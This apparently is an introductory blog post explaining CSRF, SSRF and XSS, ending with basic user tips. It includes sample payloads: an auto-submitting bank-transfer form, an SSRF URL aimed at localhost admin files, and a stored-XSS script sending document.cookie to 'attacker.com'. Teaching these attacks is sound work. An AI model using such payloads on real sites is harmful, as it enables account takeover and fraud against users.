What is, CSRF, XSS and SSRF?

tom

CSRF< XSS AND SSRF are commons ways in which attackers can get information from unsuspecting suspects. Attackers use a wide range of attacks when trying to get information from a potential target. Here I will be explaining three of the main types, that commonly get mixed up due to how similar they are. These are:

  • Cross Site Request Forgery (CSRF)
  • Server Side Request Forgery (SSRF)
  • Cross Site Scripting (XSS)
    • This also is broken down into, reflected XSS and persistent XSS

CSRF, XSS, and SSRF, which are all web security vulnerabilities but differ in how they work and the type of attacks they enable. I will then explain how to mitigate the mentioned issues at the end.

Cross Site Request Forgery

CSRF tricks a user into performing an unwanted action on a website where they are already authenticated previously (e.g., while logged into their account). It exploits the trust that a website has in the user’s browser and is probably one of the more common ones to see.

CSRF happens in the following order:

  1. The user logs into a trusted website (e.g., their bank account).
  2. The attacker creates a malicious link or script and gets the user to click it (e.g., via email or a phishing website).
  3. When clicked, the request appears to come from the user’s browser, along with their cookies/session, so the server assumes it’s a legitimate action.

This could be as easy as someone sending you a link to a website with a form that has the following code:

<form action=”https://bank.com/transfer” method=”POST”>
<input type=”hidden” name=”amount” value=”1000″>
<input type=”hidden” name=”to_account” value=”attacker_account”>
</form>
<script>document.forms[0].submit();</script>

This will then use your current logged in session on bank.com on your computer and complete a transfer as the bank currently trusts your computer.

In reality it would likely not be this simple but for this scenario this is how it could work. This could allow an attacker to send money, access files, among many other things.

Server Side Request Forgery

SSRF allows an attacker to trick a server into making requests to unintended destinations, including internal systems or sensitive endpoints. This differs from CRSF in that you are tricking the server into making a request not the user.

  1. A web application accepts user input (e.g., a URL to fetch data or images).
  2. The attacker provides a malicious URL (e.g., http://localhost/admin).
  3. The server makes the request to the provided URL, potentially exposing sensitive data or interacting with internal systems.

Imagine a web application allows users to provide a URL to upload their profile picture. The application fetches the image from the provided URL and stores it on the server. The code might look like this:

import requests

def fetch_image(image_url):
    response = requests.get(image_url)  # Fetch the image from the URL
    if response.status_code == 200:
        with open('profile_picture.jpg', 'wb') as f:
            f.write(response.content)
    else:
        print("Failed to fetch the image.")

An attacker could the use: 

http://yourserver.com/fetch-title?url=http://localhost:8080/admin/passwords.txt

To access the admin page passwords.

This could allow access to sensitive internal data.

Cross Site Scripting

XSS is a vulnerability where an attacker injects malicious scripts into web pages viewed by other users.

  1. The attacker injects a malicious script (e.g., JavaScript) into a vulnerable website.
  2. When other users visit the affected page, their browsers execute the attacker’s script.
  3. The script can steal cookies, hijack sessions, or even redirect users to malicious websites.

There are two main types (There are three but I will discuss the two main ones)

Stored XSS: The malicious script is saved on the server and served to all users (e.g., in a comment section or profile page). This could be a user adding a comment such as: 

<script>document.location = 'http://attacker.com?cookie=' + document.cookie;</script>

This would then be run every time a user opens the comments section, this would then send the cookie to the attackers browser.

Reflected XSS: The script is included in a response (e.g., via a URL) and executed in the victim’s browser.

This would be will be if inputs are not properly sanitised. Say someone sends you an email with this link 

https://example.com/search?q=<script>alert('Hacked!')</script>

This would give you a popup saying “Hacked” scary I know. But hackers could just as easily write a link with script to steal your login session cookie and then use that to log into your account.

How to prevent all of the above.

Quite often it is down to the developers of the web applications to fix these issues but here are some tips to not falling foul of these attacks:

  1. Avoid Clicking on Suspicious Links
  2. Hover over links to check the URL before clicking.
  3. Log Out When Not Using Sensitive Accounts
  4. Be Wary of Phishing Emails
  5. Enable multi-factor authentication

Be sure to check out our other Cyber Security posts for more information:

Cyber Security Posts

See below for some further reading about the above:

https://www.cloudflare.com/en-gb/learning/security/threats/cross-site-request-forgery/

Leave a Reply

Your email address will not be published. Required fields are marked *